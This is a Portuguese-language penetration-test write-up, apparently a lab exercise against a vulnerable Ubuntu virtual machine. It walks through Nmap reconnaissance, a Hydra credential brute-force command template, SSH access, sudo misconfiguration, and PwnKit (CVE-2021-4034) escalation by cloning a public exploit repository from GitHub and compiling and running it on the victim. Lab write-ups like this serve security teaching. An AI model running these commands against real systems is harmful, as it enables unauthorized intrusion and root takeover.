
Fluxo de trabalho completo de teste de penetração: força bruta de credenciais, acesso SSH e escalonamento de privilégios (CVE-2021-4034)
Fluxo completo de teste de penetração: força bruta de credenciais, acesso SSH e escalonamento de privilégios (CVE-2021-4034)
VISÃO GERAL
Este projeto demonstra um fluxo completo de teste de penetração contra uma máquina virtual Ubuntu vulnerável. A cadeia de ataque inclui reconhecimento, força bruta de credenciais, acesso inicial e escalonamento de privilégios usando múltiplas técnicas.
FERRAMENTAS UTILIZADAS
Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)
RECONHECIMENTO
O reconhecimento foi realizado usando Nmap, que revelou o número de hosts ativos na rede específica (wifi).
nmap < Network IP 0/24 > : Isso revelou o número de hosts ativos e seus endereços MAC.

Como observado, a VM estava sendo executada no ORACLE VIRTUAL BOX, pudemos identificar que esta era nossa VM vulnerável e o IP a seguir.
Uma varredura adicional revelou portas abertas vulneráveis detectadas para ataque.
EXPLORAÇÃO PRIMÁRIA
Usando isso, tentei um ataque de força bruta de credenciais bem-sucedido com a ajuda do Hydra hydra -l < USERNAME > or -L < File.txt > -p < PASSWORD > or -P < File.txt > < TARGET IP > < PORT >
Esse exploit de senha bem-sucedido nos levou a usar as credenciais para a exploração da porta SSH também.
ssh < USERNAME@TARGET IP > Password < exploit password >
Isso nos deu acesso inicial ao sistema da vítima. Além disso, a má configuração do sudo nos deu acesso total ao root. sudo -l : (ALL : ALL) ALL
sudo su foi o escalonamento
EXPLORAÇÃO SECUNDÁRIA
Continuamos a explorar o sistema da vítima com a ajuda do "Pwnkit CVE-2021-4034".
PwnKit (CVE-2021-4034) é uma vulnerabilidade crítica de segurança descoberta no início de 2022 pela equipe de pesquisa da Qualys, afetando o framework Polkit em sistemas Linux. É uma falha de escalonamento local de privilégios (LPE) que permite que qualquer usuário padrão e sem privilégios obtenha privilégios totais de root (acesso administrativo) em um sistema. A vulnerabilidade existe desde a introdução do Polkit em 2009 e é considerada "trivial" de explorar, tornando-a altamente perigosa.
Common Vulnerabilities and Exposures (CVE) é uma lista padronizada e publicamente divulgada de vulnerabilidades e exposições de segurança cibernética em software e hardware.
INSTALANDO O CVE-2021-4034 e Explorando a VM
Primeiro, confirmei que o sistema alvo era potencialmente vulnerável verificando a presença e as permissões do pkexec: which pkexec output: ls -la /usr/bin/pkexec O binário tinha o bit SUID configurado, indicando que é executado com privilégios de root, tornando-o um alvo viável para exploração.
Preparar o Ambiente
Para compilar o exploit, as ferramentas necessárias foram instaladas: sudo apt update sudo apt install git build-essential -y Isso garantiu que o sistema tivesse o compilador e as dependências necessárias. Se o apt do sistema tiver tarefas em segundo plano em execução, mate-as.
Transferir / Obter Código do Exploit
O exploit foi clonado diretamente na máquina da vítima:
cd /tmp
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
Usar /tmp evita desorganização e reflete um comportamento realista de atacante.

Compilar o Exploit
O exploit foi compilado usando: "make" Isso gerou o executável necessário para acionar a vulnerabilidade.
Executar o Exploit
O exploit foi executado: ./cve-2021-4034
Verificar o Escalonamento de Privilégios
Após a execução, o acesso root foi confirmado: whoami Output: root
Este exploit funciona porque o pkexec lida incorretamente com variáveis de ambiente, permitindo que atacantes executem código arbitrário com privilégios elevados.
CONCLUSÃO
Este exercício demonstra como um usuário aparentemente com poucos privilégios pode escalar para o controle total do sistema explorando uma vulnerabilidade conhecida como PwnKit (CVE-2021-4034). Ao combinar o acesso inicial por meio de comprometimento de credenciais com enumeração e exploração sistemáticas, foi possível alcançar acesso root sem depender apenas de configurações incorretas. Isso destaca a importância crítica da gestão oportuna de patches e práticas de configuração seguras. Mesmo uma única vulnerabilidade negligenciada pode levar ao comprometimento completo do sistema, enfatizando a necessidade de avaliações contínuas de segurança e estratégias de defesa em profundidade.